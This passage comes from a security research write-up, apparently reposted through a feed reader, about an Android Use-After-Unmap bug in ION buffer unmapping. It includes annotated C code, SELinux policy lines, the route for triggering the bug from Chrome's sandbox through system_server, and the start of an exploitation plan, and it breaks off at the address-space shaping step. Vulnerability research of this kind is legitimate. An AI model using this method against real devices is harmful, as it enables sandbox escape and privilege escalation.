err = memalloc->unmap_buffer((void*)hnd->base, hnd->size, hnd->offset); //---> while unmapping, hnd->offset is not used, hnd->base is used as the base address, map and unmap are mismatched.
if (err) {
ALOGE("Could not unmap memory at address %p, %s", (void*) hnd->base,
strerror(errno));
return -errno;
}
hnd->base = 0;
}
……
return 0;
}
int IonAlloc::unmap_buffer(void *base, unsigned int size,
unsigned int /*offset*/)
//---> look, offset is not used by unmap_buffer
{
int err = 0;
if(munmap(base, size)) {
err = -errno;
ALOGE("ion: Failed to unmap memory at %p : %s",
base, strerror(errno));
}
return err;
}
Although SeLinux restricts the domain isolated_app to access most of Android system service, isolated_app can still access three Android system services.
52neverallow isolated_app {
53 service_manager_type
54 -activity_service
55 -display_service
56 -webviewupdate_service
57}:service_manager find;
To trigger the aforementioned Use-After-Unmap bug from Chrome's sandbox, first put a GraphicBuffer object, which is parseable into a bundle, and then call the binder method convertToTranslucent of IActivityManager to pass the malicious bundle to system_server. When system_server handles this malicious bundle, the bug is triggered.
This EoP bug targets the same attack surface as the bug in our 2016 MoSec presentation, A Way of Breaking Chrome's Sandbox in Android. It is also similar to Bitunmap, except exploiting it from a sandboxed Chrome render process is more difficult than from an app.
To exploit this EoP bug:
1. Address space shaping. Make the address space layout look as follows, a heap chunk is right above some continuous ashmem mapping:
7f54600000-7f54800000 rw-p 00000000 00:00 0           [anon:libc_malloc]
7f58000000-7f54a00000 rw-s 001fe000 00:04 32783 /dev/ashmem/360alpha29 (deleted)
7f54a00000-7f54c00000 rw-s 00000000 00:04 32781 /dev/ashmem/360alpha28 (deleted)
7f54c00000-7f54e00000 rw-s 00000000 00:04 32779 /dev/ashmem/360alpha27 (deleted)
7f54e00000-7f55000000 rw-s 00000000 00:04..
Read Full Article
Visit website

Read for later

Articles marked as Favorite are saved for later viewing.
close
  • Show original
  • .
  • Share
  • .
  • Favorite
  • .
  • Email
  • .
  • Add Tags 

Separate tags by commas
To access this feature, please upgrade your account.
Start your free month
Free Preview